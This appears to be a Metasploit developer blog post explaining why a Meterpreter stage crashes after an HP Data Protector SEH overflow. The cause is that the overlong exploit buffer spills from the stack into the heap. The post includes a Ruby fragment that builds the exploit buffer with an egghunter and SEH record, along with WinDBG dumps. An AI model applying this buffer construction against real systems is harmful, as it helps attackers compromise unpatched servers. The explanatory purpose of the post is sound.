Last year at BSides Vegas, James Lee (egypt) and David Rude (bannedit) did a presentation about "Long Beard's Guide to Exploit Dev".  During the talk, James said one thing that I'll never forget: "exploit development is never an easy task, because pretty much every step you do -- finding the offset, finding a return value, using a ROP gadget, etc -- could lead to a failure." Ain't that the truth!  But here's the thing, exploits don't just fail before you pop a shell, it can also happen WHILE you're getting a shell... and that's where my story is.

Let's say you're writing an exploit.  You've done all the hard work to put it all together: you spent days in a debugger trying to do some decent root cause analysis for the bug, find all the bad characters, you bypass all the memory protections such as /GS, SafeSEH, you ROP it like a ROP star, and you bypass ASLR like a boss.  Your friends praise you for the accomplishment, some people might even call your exploit "sophisticated".... and then all of a sudden, this is all the "code execution" you get out of your awesome exploit:

msf  exploit(0day) > exploit [*] Server started. [*] Sending request to 10.0.1.4:80... [*] Leaked address: 0x61990000 [*] Sending final payload... [*] Sending stage (752128 bytes) to 10.0.1.4 

"Hey, WTH?", you say.  For some reason the exploit fails after you've sent the second stage to the vulnerable application, and then the server crashes (this is the key behavior).  You fire the module a couple of times just to make sure, but same thing.  Your shell keeps slipping away from your fingertips... what a nightmare!  This is a pretty nasty problem, because the root cause most likely comes from the exploit.  It also can be a hassle to fix, and you will see why when you see one of the solutions in the end.  But for now, I should probably explain why this is happening.

We ran into the same problem recently while developing the exploit for HP Data Protector, so I'll use that as a case-study.  During the later stage of the development of that module, the buffer was crafted this way:

 print_status("Using egghunter with checksum") hunter,egg = generate_egghunter(payload.encoded, payload_badchars, { :checksum => true, :eggtag => 'w00t' }) my_payload = egg my_payload << "A"*(target['Offset']-my_payload.length) my_payload << generate_seh_record(target.ret) my_payload << hunter my_payload << "A"*(4080-my_payload.length) 

As you can see, the max buffer size is 4080 bytes -- this is key.  And then when we fire up this module, we'd see the same stage delivering message, and then hit this bug:

0:008> r eax=03f664d4 ebx=3743fde1 ecx=0000c9ed edx=000c1000 esi=3743fdc9 edi=03f501a4 eip=7c952d6b esp=019ed278 ebp=019ed2ec iopl=0         nv up ei pl nz na pe nc cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010206 ntdll!RtlQueryProcessHeapInformation 0x2ba: 7c952d6b 8b4e14          mov     ecx,dword ptr [esi 14h] ds:0023:3743fddd=???????? 0:008> k ChildEBP RetAddr  019ed2ec 7c953341 ntdll!RtlQueryProcessHeapInformation 0x2ba 019ed348 7c864afe ntdll!RtlQueryProcessDebugInformation 0x1ee 019ed36c 03bd7e23 kernel32!Heap32First 0x48 WARNING: Frame IP not in any known module. Following frames may be wrong. 019edc2c 7c802600 0x3bd7e22 019edc7c 00000000 kernel32!WaitForSingleObjectEx 0xd8 

We should probably point out that ESI is actually a string that's user-supplied.  We were able to determine this, because when we tested the module again with pattern_create() instead of a long string of "A"s, pattern_offset.rb was able to locate the string... exactly 38 bytes after the egghunter.  So the above WinDBG log shows that after the staged payload delivery, there is some sort of heap corruption, and evidently our string has something to do with that.

Remember, this buffer overflow is supposed to be all stack smashing. But as we examine the memory more closely by doing a non-crashy request vs the crashy one, we found something interesting.  The following is the memory dump starting where the SEH is (that we overwrite):

Stack from the healthy version of the exploitStack from the non-healthy version of the exploit
0244ff9c  d64d06eb 0244ffa0  66dd3e49 SE Handler 0244ffa4  ffca8166 0244ffa8  6a52420f 0244ffac  2ecd5802 0244ffb0  745a053c 0244ffb4  3077b8ef 0244ffb8  d7897430 0244ffbc  afea75af 0244ffc0  3151e775 0244ffc4  02c031c9 0244ffc8  66410f04 0244ffcc  013df981 0244ffd0  043af575 0244ffd4  d175590f 0244ffd8  3077e7ff 0244ffdc  ff007430 0244ffe0  7c839ac0 kernel32!_except_handler3 0244ffe4  7c80b720 kernel32!`string' 0x88 0244ffe8  00000000 0244ffec  00000000 0244fff0  00000000 0244fff4  1022db2c dpwinsup!Mbcsisupper 0x21d627 0244fff8  019d75a0 0244fffc  00000000 Stack 02450000  000000c1 starting here is the heap 02450004  0000017a 02450008  eeffeeff 0245000c  00001003 02450010  00000001 02450014  0000fe00 02450018  00100000 0245001c  00002000 02450020  00000200 02450024  00002000 02450028  00001f6d 0245002c  7ffdefff 02450030  06080019 
0244ff9c  d64d06eb 0244ffa0  66dd3e49 SE Handler 0244ffa4  ffca8166 0244ffa8  6a52420f 0244ffac  2ecd5802 0244ffb0  745a053c 0244ffb4  3077b8ef 0244ffb8  d7897430 0244ffbc  afea75af 0244ffc0  3151e775 0244ffc4  02c031c9 0244ffc8  66410f04 0244ffcc  013df981 0244ffd0  043af575 0244ffd4  d175590f 0244ffd8  41414141 0244ffdc  41414141 0244ffe0  41414141 0244ffe4  41414141 0244ffe8  00000000 0244ffec  00000000 0244fff0  00000000 0244fff4  41414141 0244fff8  41414141 0244fffc  04141414  Still stack 02450000  41414141  starting here is the heap 02450004  41414141 02450008  41414141 0245000c  41414141 02450010  41414141 02450014  41414141 02450018  41414141 0245001c  41414141 02450020  41414141 02450024  41414141 02450028  41414141 0245002c  41414141 02450030  41414141 

In case you haven't noticed, yes, while the exploit is overflowing the stack, it's also writing to the heap.  A simple !address command verifies this:

0:010> !address 0244fffc      02350000 : 02440000 - 00010000                     Type     00020000 MEM_PRIVATE                     Protect  00000004 PAGE_READWRITE                     State    00001000 MEM_COMMIT                     Usage    RegionUsageStack                     Pid.Tid  69a0.6ac4 0:010> !address 02450000     02450000 : 02450000 - 00016000                     Type     00020000 MEM_PRIVATE                     Protect  00000004 PAGE_READWRITE                     State    00001000 MEM_COMMIT                     Usage    RegionUsageHeap                     Handle   02450000 

And clearly, the dt command shows what the corrupt heap structure 0x02450000 looks like:

     0:010> dt _HEAP 02450000      ntdll!_HEAP         0x000 Entry            : _HEAP_ENTRY         0x008 Signature        : 0x41414141         0x00c Flags            : 0x41414141         0x010 ForceFlags       : 0x41414141         0x014 VirtualMemoryThreshold : 0x41414141         0x018 SegmentReserve   : 0x41414141         0x01c SegmentCommit    : 0x41414141         0x020 DeCommitFreeBlockThreshold : 0x41414141         0x024 DeCommitTotalFreeThreshold : 0x41414141         0x028 TotalFreeSize    : 0x41414141         0x02c MaximumAllocationSize : 0x41414141         0x030 ProcessHeapsListIndex : 0x4141         0x032 HeaderValidateLength : 0x4141         0x034 HeaderValidateCopy : 0x41414141         0x038 NextAvailableTagIndex : 0x4141         0x03a MaximumTagIndex  : 0x4141         0x03c TagEntries       : 0x41414141 _HEAP_TAG_ENTRY         0x040 UCRSegments      : 0x41414141 _HEAP_UCR_SEGMENT         0x044 UnusedUnCommittedRanges : 0x41414141 _HEAP_UNCOMMMTTED_RANGE         0x048 AlignRound       : 0x41414141         0x04c AlignMask        : 0x41414141         0x050 VirtualAllocdBlocks : _LIST_ENTRY [ 0x41414141 - 0x41414141 ]         0x058 Segments         : [64] 0x41414141 _HEAP_SEGMENT         0x158 u                : __unnamed         0x168 u2               : __unnamed         0x16a AllocatorBackTraceIndex : 0x4141         0x16c NonDedicatedListLength : 0x41414141         0x170 LargeBlocksIndex : 0x41414141         0x174 PseudoTagEntries : 0x41414141 _HEAP_PSEUDO_TAG_ENTRY         0x178 FreeLists        : [128] _LIST_ENTRY [ 0x41414141 - 0x41414141 ]         0x578 LockVariable     : (null)         0x57c CommitRoutine    : (null)         0x580 FrontEndHeap     : (null)         0x584 FrontHeapLockCount : 0         0x586 FrontEndHeapType : 0 ''         0x587 LastSegmentIndex : 0 '' 

When the payload uses the heap, that's when we get the crash.  Based on our data, this crash tends to happen after the handler complets transmitting the payload (that's after recv), and then when the Tool Help Functions ends up using the bad heap (CreateToolHelp32Snapshot -> kernel32.Heap32ListFirst -> Heap32First, in particular), causing our meterpreter to crash.  We have also seen other behaviors that lead to the crash, but not too far off from the same reason.

The Solutions

Now we know for scenarios like this, the user-supplied buffer is highly likely the root cause of the problem.  In our case with HP Data Protector, the string is just way to long, and it's overwriting the heap.  We have seen a few proven solutions in the past, and here they are:

  • Avoid corrupting the heap by reducing your malicious string size.  This should be the most simple way you should try first, but may not always work well for you because a smaller size buffer may not even trigger the vulnerability you're exploiting.
  • Inject your payload somewhere else, where no heap is busted.  So far this technique has only been used once, and it was done by corelanc0d3r and lincoln.  This is similar to using the 'migrate' feature in a meterpreter, except their injection routine occurs before the actual Metasploit payload begins. You can read up more about this technique here.
  • Induce a heap pointer manually, for example: ms04_011_pct.rb

And hopefully one of the above recommendations will do the trick for you.

By the way, in case you're interested in Metasploit module development, make sure to create your development setup, and then join the sweet action of the Metasploit Project.  Github and Redmine often reveal a lot about how a module is made, and every exploit always tends to be an unique story -- great places to begin your exploit development journey!